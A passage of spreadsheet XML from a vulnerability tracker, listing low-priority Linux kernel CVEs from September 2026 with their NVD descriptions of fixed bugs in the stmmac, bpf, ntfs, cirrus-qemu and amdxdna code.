Additionally, if sas_port_add() fails, the allocated port is not freed
before jumping to out_fail, leaking the sas_port structure. Call
sas_port_free() to properly release it.</t>
        </is>
      </c>
      <c r="T745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98129</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98131</t>
        </is>
      </c>
      <c r="D746" s="5" t="inlineStr"/>
      <c r="E746" s="5" t="inlineStr"/>
      <c r="F746" s="5" t="inlineStr"/>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="inlineStr"/>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr"/>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q746" s="5" t="inlineStr"/>
      <c r="R746" s="5" t="inlineStr"/>
      <c r="S746" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix dma mapping leak in stmmac_tso_xmit()
In stmmac_tso_xmit(), if the DMA mapping of an skb fragment fails, the
frame is dropped but the DMA mappings already created for the linear
part and for the fragments mapped before the failure are never
unmapped, leaking DMA mappings.
Fix the leak by walking back over the descriptors used by the frame and
releasing each of them with stmmac_free_tx_buffer(). Moreover, release
the descriptors with stmmac_release_tx_desc() unmapping the DMA buffers.</t>
        </is>
      </c>
      <c r="T746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98131</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98132</t>
        </is>
      </c>
      <c r="D747" s="5" t="inlineStr"/>
      <c r="E747" s="5" t="inlineStr"/>
      <c r="F747" s="5" t="inlineStr"/>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="inlineStr"/>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr">
        <is>
          <t>checkpoint, go</t>
        </is>
      </c>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q747" s="5" t="inlineStr"/>
      <c r="R747" s="5" t="inlineStr"/>
      <c r="S747" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: don't downgrade half-dead scalar zero spills to STACK_ZERO
states.c:__clean_func_state() can downgrade scalar zero spill to
STACK_ZERO in the following case:
  *(u64 *)(r10 - 8) = 0;
  ... checkpoint ...
  r1 = *(u32 *)(r10 - 4);
  ... no reads from r10-8 ...
Here 4 bytes at r10-8 are dead and verifier changes scalar spill to a
combination: 0000pppp (p stands for poison). Such a change breaks
precision propagation chains. All places that produce STACK_ZERO
should call bpf_mark_chain_precision() for the zero source.
This patch fixes the bug in a simplest way possible:
avoids converting stack spills of zero to STACK_ZERO.
Two smarter approaches are possible:
- do bpf_mark_chain_precision() from __clean_func_state()
- check slot liveness information in check_stack_write_fixed_off()
I investigated both and the changes required are a bit tricky,
hence go with a simple fix for the time being.</t>
        </is>
      </c>
      <c r="T747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98132</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98133</t>
        </is>
      </c>
      <c r="D748" s="5" t="inlineStr"/>
      <c r="E748" s="5" t="inlineStr"/>
      <c r="F748" s="5" t="inlineStr"/>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="inlineStr"/>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr"/>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q748" s="5" t="inlineStr"/>
      <c r="R748" s="5" t="inlineStr"/>
      <c r="S748" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: leave HasEA flag untouched on setxattr failure
In ntfs_set_ea(), the exit path unconditionally updates the HasEA
flag based on ea_info_qsize. When an error occurs before
ea_info_qsize is updated, NInoClearHasEA() hides existing on-disk
EAs until the inode is evicted.
Only update the flag on success.</t>
        </is>
      </c>
      <c r="T748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98133</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98134</t>
        </is>
      </c>
      <c r="D749" s="5" t="inlineStr"/>
      <c r="E749" s="5" t="inlineStr"/>
      <c r="F749" s="5" t="inlineStr"/>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="inlineStr"/>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K749" s="5" t="inlineStr"/>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q749" s="5" t="inlineStr"/>
      <c r="R749" s="5" t="inlineStr"/>
      <c r="S749" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: check_cond_jmp_op(): properly infer if register is null
Nicholas Carlini reported a bug when verifier can incorrectly infer
that a pointer is non-null. The bug occurs when two pointers are
compared and one of them has a type w/o PTR_MAYBE_NULL flag,
but which allows a value to be NULL at runtime.
Here is an example:
  // `a` is PTR_TO_MEM | MEM_RDONLY | PTR_UNTRUSTED
  // `a` is 0 at runtime.
  // `b` is PTR_TO_MAP_VALUE | PTR_MAYBE_NULL
  void *a = bpf_rdonly_cast(0, 0);
  int  *b = bpf_map_lookup_elem(...);
  if (a == b)
    *b = 42;  // verifier does not catch null pointer dereference
This happens because of a special case in check_cond_jmp_op(),
which attempts to strip PTR_MAYBE_NULL flags from pointer types,
when processing comparisons like `rA == rB`, if either rA or rB can't
be null.
The non-null property is derived based on the absence of
PTR_MAYBE_NULL flag on rA's or rB's type. But that is not sufficient
for types like PTR_TO_MEM, as in the example.
This patch replaces type_may_be_null() call with reg_not_null(),
which contains an allowlist of types for which absence of
PTR_MAYBE_NULL actually means that the value can't be NULL at runtime.
At the moment, the list in the reg_not_null() omits two types for
which PTR_MAYBE_NULL is applicable: PTR_TO_XDP_SOCK and PTR_TO_BUF.
In order to remain backward compatible, and assuming that only
comparison between pointers of the same type makes sense,
this commit extends reg_not_null(). W/o such an extension e.g.
verifier_jeq_infer_not_null/null_ptr_to_map_value fails.
reg_not_null() can be extended further, but I deem that out of scope
for the fix at hand. Explicit base_type(...) != PTR_TO_BTF_ID
checks in the check_cond_jmp_op() can be removed with migration to
reg_not_null(), but that is a behavioural change, as the special case
would start matching for PTR_TO_BTF_ID that is also is_trusted_reg().
I omit the behavioural change from this commit.</t>
        </is>
      </c>
      <c r="T749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98134</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98135</t>
        </is>
      </c>
      <c r="D750" s="5" t="inlineStr"/>
      <c r="E750" s="5" t="inlineStr"/>
      <c r="F750" s="5" t="inlineStr"/>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="inlineStr"/>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr"/>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q750" s="5" t="inlineStr"/>
      <c r="R750" s="5" t="inlineStr"/>
      <c r="S750" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject invalid sectors_per_cluster in the boot sector
is_boot_sector_ntfs() checks the boot sector's sectors_per_cluster field
with a range test that rejects 0x81..0xf3 but accepts 0 and other
non-power-of-two counts. A zero value reaches parse_ntfs_boot_sector():
	sectors_per_cluster_bits = ffs(sectors_per_cluster) - 1;
	...
	vol-&gt;cluster_size = vol-&gt;sector_size &lt;&lt; sectors_per_cluster_bits;
ffs(0) is 0, so sectors_per_cluster_bits becomes (unsigned)-1 and the
shift is undefined:
  UBSAN: shift-out-of-bounds in fs/ntfs/super.c:673:39
  shift exponent 4294967295 is too large for 32-bit type 'int'
This change rejects any non-power-of-two value, since it feeds the
aforementioned shift via ffs() - 1, which only yields the correct shift for a
power of two.</t>
        </is>
      </c>
      <c r="T750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98135</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98136</t>
        </is>
      </c>
      <c r="D751" s="5" t="inlineStr"/>
      <c r="E751" s="5" t="inlineStr"/>
      <c r="F751" s="5" t="inlineStr"/>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr"/>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q751" s="5" t="inlineStr"/>
      <c r="R751" s="5" t="inlineStr"/>
      <c r="S751" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: bound $AttrDef table walk to the loaded table size
ntfs_attr_find_in_attrdef() walks the in-memory $AttrDef table, but the
loop condition bounds only the start of each entry, not the whole entry:
	for (ad = vol-&gt;attrdef; (u8 *)ad - (u8 *)vol-&gt;attrdef &lt;
			vol-&gt;attrdef_size &amp;&amp; ad-&gt;type; ++ad)
struct attr_def is 160 bytes; the guard reads ad-&gt;type at offset 128 and
the loop body reads further fields. vol-&gt;attrdef is kvzalloc(i_size),
where i_size is the on-disk $AttrDef data size, checked in
load_and_init_attrdef() only as 0 &lt; i_size &lt;= 0x7fffffff. A volume whose
$AttrDef data size is smaller than one entry (e.g. 120 bytes) makes the
read of ad-&gt;type run past the allocation. Creating a file reaches this
through ntfs_attr_size_bounds_check() and reads out of bounds:
  BUG: KASAN: slab-out-of-bounds in ntfs_attr_find_in_attrdef+0x66/0xa0
  Read of size 4 at addr ffff888005833280 by task init/1
   ntfs_attr_find_in_attrdef
   ntfs_attr_size_bounds_check
   ntfs_attr_can_be_non_resident
   ntfs_attr_add
Require the whole entry to lie within attrdef_size in the loop guard, and
reject at mount a $AttrDef too small to hold one attr_def entry.</t>
        </is>
      </c>
      <c r="T751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98136</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98137</t>
        </is>
      </c>
      <c r="D752" s="5" t="inlineStr"/>
      <c r="E752" s="5" t="inlineStr"/>
      <c r="F752" s="5" t="inlineStr"/>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K752" s="5" t="inlineStr"/>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q752" s="5" t="inlineStr"/>
      <c r="R752" s="5" t="inlineStr"/>
      <c r="S752" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: treat any nonzero dio zero-range return as an error
ntfs_dio_zero_range() returns either 0 or a negative errno from
blkdev_issue_zeroout(); it never returns a positive value.  The
zeroing failure check in ntfs_attr_fallocate() therefore never fired,
so a failed zeroing operation was silently ignored: the loop kept
going, the newly allocated clusters were folded into initialized_size
and the write could succeed leaving stale on-disk data.
Treat any nonzero return as an error and abort the allocation.</t>
        </is>
      </c>
      <c r="T752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98137</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98138</t>
        </is>
      </c>
      <c r="D753" s="5" t="inlineStr"/>
      <c r="E753" s="5" t="inlineStr"/>
      <c r="F753" s="5" t="inlineStr"/>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="inlineStr"/>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr"/>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q753" s="5" t="inlineStr"/>
      <c r="R753" s="5" t="inlineStr"/>
      <c r="S753" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: do not mark the volume clean in sync_fs when errors were recorded
ntfs_put_super() and the remount-read-only path both clear the dirty bit
only when NVolErrors(vol) is false. ntfs_sync_fs() clears it
unconditionally, so any sync() on a volume that recorded an error marks
that volume clean. A volume without this set is then seen as not needing
recovery and it does not run one, so whatever went wrong is never repaired.
This change skips resetting the dirty bit when there are volume errors.
Reproduced on a volume whose $MFTMirr does not match $MFT, which sets the
error flag while leaving the mount read-write: after a write and a sync,
the on-disk volume flags read 0x0000 with this driver and 0x0001 with the
guard in place.</t>
        </is>
      </c>
      <c r="T753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98138</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98139</t>
        </is>
      </c>
      <c r="D754" s="5" t="inlineStr"/>
      <c r="E754" s="5" t="inlineStr"/>
      <c r="F754" s="5" t="inlineStr"/>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr"/>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q754" s="5" t="inlineStr"/>
      <c r="R754" s="5" t="inlineStr"/>
      <c r="S754" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: only count successfully cleared runs when freeing clusters
ntfs_cluster_free_from_rl_nolock() adds a run's length to nr_freed
whenever the error bookkeeping condition is false, which includes
cases where ntfs_bitmap_clear_run() actually failed - e.g. a second
run failing with the same errno as an earlier one, or any failure
after a non-ENOMEM error was already recorded. Since a failed
ntfs_bitmap_clear_run() rolls back its partial modifications, no
bits were cleared for that run, yet its length still inflates
vol-&gt;free_clusters, corrupting statfs output and the allocator's
free space gate.
Only count runs whose bitmap clear succeeded.</t>
        </is>
      </c>
      <c r="T754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98139</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98140</t>
        </is>
      </c>
      <c r="D755" s="5" t="inlineStr"/>
      <c r="E755" s="5" t="inlineStr"/>
      <c r="F755" s="5" t="inlineStr"/>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr"/>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q755" s="5" t="inlineStr"/>
      <c r="R755" s="5" t="inlineStr"/>
      <c r="S755" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: fix kmap_local leak in write_mft_record_nolock() error paths
write_mft_record_nolock() maps the MFT record folio with
kmap_local_folio(), but the pre_write_mst_fixup() and
bio_add_folio() failure paths jump to the error label without
unmapping it. kmap_local mappings are stack-ordered per task, so
leaking one corrupts the nesting for any outer mapping.
Unmap the folio on those error paths too.</t>
        </is>
      </c>
      <c r="T755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98140</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98141</t>
        </is>
      </c>
      <c r="D756" s="5" t="inlineStr"/>
      <c r="E756" s="5" t="inlineStr"/>
      <c r="F756" s="5" t="inlineStr"/>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr"/>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q756" s="5" t="inlineStr"/>
      <c r="R756" s="5" t="inlineStr"/>
      <c r="S756" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: propagate reparse index insertion failure
update_reparse_data() ignores the return value of
set_reparse_index(). When index insertion fails, the code removes
the just-written reparse data as cleanup but still returns 0, so
symlink(2) (and WSL special file creation) reports success while
no reparse data exists on disk. When there was no previous reparse
data (oldsize == 0), the failure was likewise silently ignored.
Propagate the error to the caller.</t>
        </is>
      </c>
      <c r="T756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98141</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98142</t>
        </is>
      </c>
      <c r="D757" s="5" t="inlineStr"/>
      <c r="E757" s="5" t="inlineStr"/>
      <c r="F757" s="5" t="inlineStr"/>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="inlineStr"/>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr"/>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q757" s="5" t="inlineStr"/>
      <c r="R757" s="5" t="inlineStr"/>
      <c r="S757" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/cirrus-qemu: Validate BAR0 size during probe
The `cirrus-qemu` driver relies on `CIRRUS_VRAM_SIZE` (4 MB) to validate
framebuffer sizes. However, during PCI probe, the driver mapped BAR0
without verifying that its size matches `CIRRUS_VRAM_SIZE`.
If a PCI device with a BAR0 smaller than 4 MB is bound to the driver, the
mapped VRAM will be smaller than expected. Because validation checks assume
4 MB VRAM, framebuffers larger than the mapped memory can be created.
When the display plane is updated (e.g. during release),
`cirrus_primary_plane_helper_atomic_update()` copies the framebuffer to
VRAM using `drm_fb_memcpy()`. Writing past the end of the mapped I/O memory
causes a supervisor write page fault:
BUG: unable to handle page fault for address: ffffc9000389c000
...
RIP: 0010:memcpy_toio+0x7c/0xe0 arch/x86/lib/iomem.c:110
...
Call Trace:
 &lt;TASK&gt;
 iosys_map_memcpy_to include/linux/iosys-map.h:285 [inline]
 drm_fb_memcpy+0x325/0x5d0 drivers/gpu/drm/drm_format_helper.c:442
 cirrus_primary_plane_helper_atomic_update+0x98a/0xb00
 drivers/gpu/drm/tiny/cirrus-qemu.c:358
 drm_atomic_helper_commit_planes+0x626/0xea0
 drivers/gpu/drm/drm_atomic_helper.c:3038
 drm_atomic_helper_commit_tail+0x60/0x510
 drivers/gpu/drm/drm_atomic_helper.c:1989
 commit_tail+0x2b1/0x3c0 drivers/gpu/drm/drm_atomic_helper.c:2074
 drm_atomic_helper_commit+0xa77/0xb10
 drivers/gpu/drm/drm_atomic_helper.c:2312
Fix this by validating in `cirrus_pci_probe()` that the PCI BAR0 resource
is not less than `CIRRUS_VRAM_SIZE`, returning `-ENODEV` if it is less.</t>
        </is>
      </c>
      <c r="T757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98142</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98144</t>
        </is>
      </c>
      <c r="D758" s="5" t="inlineStr"/>
      <c r="E758" s="5" t="inlineStr"/>
      <c r="F758" s="5" t="inlineStr"/>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr"/>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q758" s="5" t="inlineStr"/>
      <c r="R758" s="5" t="inlineStr"/>
      <c r="S758" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: put the chained BO when its mapping fails
amdxdna_cmd_set_error() looks up the first BO of a command chain, which
takes a reference, and drops it at the end of the function. The mapping of
that BO is established in between, and the failure path returns without the
put, so the reference is leaked.
Ordinary use does not reach it. The chain has been submitted before any of
this runs, so aie2_cmdlist_fill_slot() has already called
amdxdna_cmd_get_op() on that BO and amdxdna_gem_vmap() has cached its
address. What makes it reachable is that the BO is resolved again by
handle here, and the handle is userspace's to recycle: closing it after
submission and importing a dma-buf whose exporter implements no vmap onto
the same id leaves amdxdna_gem_get_obj() returning an object this cannot
map, since prime_import() types every import AMDXDNA_BO_SHARE.</t>
        </is>
      </c>
      <c r="T758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98144</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98145</t>
        </is>
      </c>
      <c r="D759" s="5" t="inlineStr"/>
      <c r="E759" s="5" t="inlineStr"/>
      <c r="F759" s="5" t="inlineStr"/>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr"/>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q759" s="5" t="inlineStr"/>
      <c r="R759" s="5" t="inlineStr"/>
      <c r="S759" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: reject a command chain that carries no commands
A chain whose command_count is zero passes the payload length check,
